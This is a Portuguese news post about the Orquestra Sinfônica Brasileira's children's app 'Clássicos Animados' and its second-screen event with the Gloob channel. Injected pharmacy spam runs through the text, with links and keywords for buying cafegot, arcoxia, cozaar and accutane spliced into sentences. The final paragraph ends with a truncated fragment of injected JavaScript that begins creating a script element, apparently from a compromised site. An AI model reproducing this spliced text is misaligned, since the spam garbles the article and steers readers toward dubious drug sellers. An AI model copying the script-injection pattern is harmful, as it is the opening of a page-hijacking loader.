Escrito por em 15 abr 2015 nas áreas Curiosidade, Infantil, Música sinfônica, Notícia, Tecnologia

OSB lança primeiro aplicativo educacional de música de concerto para crianças. 

 

Imagine oferecer às crianças a possibilidade de conhecer uma orquestra sinfônica de maneira lúdica, divertida e atrativa, sem sair de casa, e ainda com a chancela da Orquestra Sinfônica Brasileira (OSB) buy cafegot tablets http://bendevarimprojesi.com/?p=11075 ? Esse é o objetivo do aplicativo Clássicos Animados, o primeiro aplicativo educacional do país de sensibilização da música de concerto para o público infantil. Disponível gratuitamente nas versões IOS e Android, o app, desenvolvido e idealizado em parceria com a agência Artplan, está disponível para http://nina-afriani.mhs.narotama.ac.id/2018/02/02/buy-arcoxia-90-mg/ download e ganhá uma ação especial no canal Gloob no dia 18 de abril.

“O uso da tecnologia é uma realidade crescente dentro e fora das salas de aula, que acontece cada vez mais cedo. O aplicativo Clássicos Animados Cheap é uma ferramenta que complementa e potencializa o aprendizado de música de maneira interativa, dinâmica e lúdica. Ele vem para somar às iniciativas educacionais desenvolvidas pela Fundação OSB e, ainda, ressaltar a nossa procura por ações inovadoras que tornem a música de concerto mais atrativa e acessível aos ouvidos das crianças”, explica Anahi Ravagnani, gerente educacional da Fundação OSB.

Com arte visual e design bem coloridos e criativos, desenvolvidos para atrair os pequenos de 6 a 9 anos, a plataforma “passeia” pelas quatro famílias de instrumentos que compõem um conjunto sinfônico: cordas, madeiras, metais e percussão. Com textos acessíveis em primeira pessoa, como se os instrumentos estivessem falando com as crianças, o público mirim descobre a função e importância de cada um para todo o conjunto e, ainda, pode escutar o seu som característico gravado por músicos da OSB. A função de maestro também é apresentada com um vídeo do regente titular da Sinfônica Brasileira, Roberto Minczuk Purchase .

“É bem legal. Quando você bota no significado de cada um, aparece uma ilustração infantil e é como se o próprio instrumento estivesse falando”, conta Joana Sampaio, de 11 anos, que já está usando o app. Order is cozaar available in generic “Uma boa estratégia para conseguir público novo”, analisa a jovem.

 

Interatividade

No dia 18 de abril, quem já tiver o aplicativo poderá vivenciar a experiência second screen (segunda tela) em uma ação especial da OSB com o canal da Globosat Gloob. Na faixa das 15h às 16h, será exibido um medley com várias cenas do desenho Popeye ao som de sua música tema, interpretada pela Orquestra. Ao mesmo tempo, no aplicativo, um vídeo mostrará a orquestra executando a famosa trilha. Nessa faixa de horário, o Gloob realizará uma maratona do desenho Popeye e a ação de segunda tela ocorrerá nos intervalos da programação e das demais atrações do canal. No aplicativo o público pode se informar dos próximos horários de exibição ao longo do dia. Para que ninguém perca o momento certo de abrir o aplicativo e dar play em sincronia com a TV, o canal está fazendo, desde 7 de abril, chamadas na programação.

O app conta também com um hotsite, no qual o público encontra mais informações sobre o aplicativo: uma explicação sobre como aproveitá-lo e sobre a experiência da segunda tela, além de mais diversão para as crianças com os personagens do app em preto e branco para imprimir e colorir.

accutane online forum “A nossa intenção com a ação é promover uma experiência enriquecedora e multiplataforma para a criança. A parceria com a OSB se encaixou perfeitamente no nosso conceito de diversão e inspiração, trazendo informações sobre os instrumentos musicais e o funcionamento de uma orquestra de forma muito orgânica e lúdica”, conta Luciane Neno, gerente de marketing do Gloob.var d=document;var s=d.createElement(‘script’);

Faça seu comentário